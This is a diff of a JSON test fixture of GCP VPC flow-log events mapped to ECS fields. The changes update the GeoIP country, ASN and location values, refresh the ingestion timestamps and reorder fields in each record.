@@ -17018,11 +17838,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33542, @@ -17094,7 +17919,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392121100Z", + "ingested": "2021-12-14T14:43:27.415264110Z", "original": "{\"insertId\":\"19im82tfdygznq\",\"jsonPayload\":{\"bytes_sent\":\"64427\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33542},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565108524Z\",\"packets_sent\":\"351\",\"reporter\":\"DEST\",\"rtt_msec\":\"173\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150870105Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.150870105Z", 
@@ -17116,11 +17941,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -17192,7 +18022,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392125800Z", + "ingested": "2021-12-14T14:43:27.415264505Z", "original": "{\"insertId\":\"19im82tfdygzn6\",\"jsonPayload\":{\"bytes_sent\":\"183366\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33690,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565311154Z\",\"packets_sent\":\"242\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075665334Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075665334Z", 
@@ -17214,11 +18044,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -17290,7 +18125,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392130200Z", + "ingested": "2021-12-14T14:43:27.415264892Z", "original": "{\"insertId\":\"19im82tfdygznk\",\"jsonPayload\":{\"bytes_sent\":\"185295\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33562,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:49.549471457Z\",\"packets_sent\":\"244\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500498059Z", 
@@ -17301,43 +18136,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.139.99.242", - "port": 9200, - "domain": "elasticsearch", - "ip": "10.139.99.242" - }, - "source": { - "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" - }, - "as": { - "number": 33652 - }, - "address": "67.43.156.13", - "port": 49438, - "bytes": 68961, - "ip": "67.43.156.13", - "packets": 711 - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:Wx9CFh/CGkJ8gWbPZ6ib0K8z+zk=", - "bytes": 68961, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 711, - "direction": "inbound" - }, "@timestamp": "2019-06-14T03:50:17.553Z", "ecs": { "version": "1.12.0" @@ -17348,6 +18146,9 @@ "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { 
@@ -17368,15 +18169,52 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392134Z", - "original": "{\"insertId\":\"19im82tfdygznm\",\"jsonPayload\":{\"bytes_sent\":\"68961\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":49438},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220725956Z\",\"packets_sent\":\"711\",\"reporter\":\"DEST\",\"rtt_msec\":\"114\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.398463104Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", - "kind": "event", - "start": "2019-06-14T03:39:59.398463104Z", + "destination": { + "address": "10.139.99.242", + "port": 9200, + "domain": "elasticsearch", + "ip": "10.139.99.242" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 49438, + "bytes": 68961, + "ip": "67.43.156.13", + "packets": 711 + }, + "event": { + "ingested": "2021-12-14T14:43:27.415265301Z", + "original": 
"{\"insertId\":\"19im82tfdygznm\",\"jsonPayload\":{\"bytes_sent\":\"68961\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":49438},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220725956Z\",\"packets_sent\":\"711\",\"reporter\":\"DEST\",\"rtt_msec\":\"114\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.398463104Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "kind": "event", + "start": "2019-06-14T03:39:59.398463104Z", "end": "2019-06-14T03:49:56.220725956Z", "id": "19im82tfdygznm", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:Wx9CFh/CGkJ8gWbPZ6ib0K8z+zk=", + "bytes": 68961, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 711, + "direction": "inbound" } }, { @@ -17385,11 +18223,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -17467,7 +18310,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392138Z", + "ingested": "2021-12-14T14:43:27.415265783Z", "original": "{\"insertId\":\"19im82tfdygzob\",\"jsonPayload\":{\"bytes_sent\":\"62072\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33532},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565272745Z\",\"packets_sent\":\"360\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.072372604Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.072372604Z", @@ -17489,11 +18332,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -17565,7 +18413,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392142100Z", + "ingested": "2021-12-14T14:43:27.415266234Z", "original": "{\"insertId\":\"19im82tfdygznc\",\"jsonPayload\":{\"bytes_sent\":\"198326\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33590,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"246\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.146956782Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.146956782Z", @@ -17581,11 +18429,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -17663,7 +18516,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392145500Z", + "ingested": "2021-12-14T14:43:27.415266650Z", "original": "{\"insertId\":\"19im82tfdygznj\",\"jsonPayload\":{\"bytes_sent\":\"61436\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33550},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"362\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500498059Z", @@ -17679,11 +18532,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -17761,7 +18619,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392149800Z", + "ingested": "2021-12-14T14:43:27.415267085Z", "original": "{\"insertId\":\"19im82tfdygzo5\",\"jsonPayload\":{\"bytes_sent\":\"66791\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33690},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565311154Z\",\"packets_sent\":\"355\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075665334Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075665334Z", 
@@ -17772,41 +18630,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.87.40.76", - "port": 5601, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "source": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.14", - "port": 54812, - "bytes": 1457, - "ip": "67.43.156.14", - "packets": 7 - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:7gePYXWz+/zKghVHNYgmCfG2ZOE=", - "bytes": 1457, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 7, - "direction": "inbound" - }, "@timestamp": "2019-06-14T03:50:17.553Z", "ecs": { "version": "1.12.0" @@ -17817,6 +18640,9 @@ "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { 
@@ -17837,8 +18663,33 @@ } } }, + "destination": { + "address": "10.87.40.76", + "port": 5601, + "domain": "kibana", + "ip": "10.87.40.76" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.14", + "port": 54812, + "bytes": 1457, + "ip": "67.43.156.14", + "packets": 7 + }, "event": { - "ingested": "2021-12-09T13:37:46.392155400Z", + "ingested": "2021-12-14T14:43:27.415267528Z", "original": "{\"insertId\":\"19im82tfdygzod\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":54812},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:45:20.708994883Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:45:20.595119257Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:45:20.595119257Z", 
@@ -17846,6 +18697,18 @@ "id": "19im82tfdygzod", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:7gePYXWz+/zKghVHNYgmCfG2ZOE=", + "bytes": 1457, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "inbound" } }, { @@ -17854,11 +18717,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -17936,7 +18804,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392160900Z", + "ingested": "2021-12-14T14:43:27.415267917Z", "original": "{\"insertId\":\"19im82tfdygzna\",\"jsonPayload\":{\"bytes_sent\":\"64466\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33562},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:49.549471457Z\",\"packets_sent\":\"363\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500498059Z", @@ -17958,11 +18826,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -18034,7 +18907,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392166400Z", + "ingested": "2021-12-14T14:43:27.415268424Z", "original": "{\"insertId\":\"19im82tfdygzng\",\"jsonPayload\":{\"bytes_sent\":\"174524\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33968,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.965294083Z\",\"packets_sent\":\"66\",\"reporter\":\"DEST\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.480272197Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.480272197Z", 
@@ -18045,9 +18918,39 @@ } }, { + "@timestamp": "2019-06-14T03:50:17.553Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "67.43.156.13", + "10.49.136.133" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "destination": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 91 + } + } + }, "destination": { "address": "10.49.136.133", "port": 52780, @@ -18056,13 +18959,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Boardman", - "region_name": "Oregon" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 16509 + "number": 35908 }, "address": "67.43.156.13", "port": 9243, 
@@ -18070,6 +18976,16 @@ "ip": "67.43.156.13", "packets": 28344 }, + "event": { + "ingested": "2021-12-14T14:43:27.415268811Z", + "original": "{\"insertId\":\"19im82tfdygzo1\",\"jsonPayload\":{\"bytes_sent\":\"181624065\",\"connection\":{\"dest_ip\":\"10.49.136.133\",\"dest_port\":52780,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":9243},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"simianhacker-demo\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:58.592579489Z\",\"packets_sent\":\"28344\",\"reporter\":\"DEST\",\"rtt_msec\":\"91\",\"src_location\":{\"asn\":16509,\"city\":\"Boardman\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Oregon\"},\"start_time\":\"2019-06-14T03:40:17.183499423Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:17.183499423Z", + "end": "2019-06-14T03:49:58.592579489Z", + "id": "19im82tfdygzo1", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -18081,17 +18997,22 @@ "iana_number": "6", "packets": 28344, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.553Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", - "10.49.136.133" + "192.168.2.117", + "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { 
